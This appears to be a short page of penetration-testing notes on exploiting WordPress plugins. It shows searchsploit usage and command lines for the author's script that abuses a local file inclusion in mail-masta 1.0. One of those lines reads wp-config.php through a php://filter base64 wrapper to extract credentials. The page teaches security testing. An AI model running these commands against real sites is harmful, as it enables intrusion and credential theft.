WordPress Plugins Exploitation
To exploit plugins, you may want to look for CVEs and exploits corresponding to your plugin version.
You can use exploit-db:
$ searchsploit WordPress Plugin <plugin_name_space_separated>
I wrote a short Python script for mail-masta 1.0
LFI:
$ # try to access a file you know it works
$ ./wp-mail-masta.py -u https://example.com/wordpress/ -f '/var/www/html/index.html'
$ # try to access wp-config file
$ ./wp-mail-masta.py -u https://example.com/wordpress/ -f 'php://filter/read=convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php'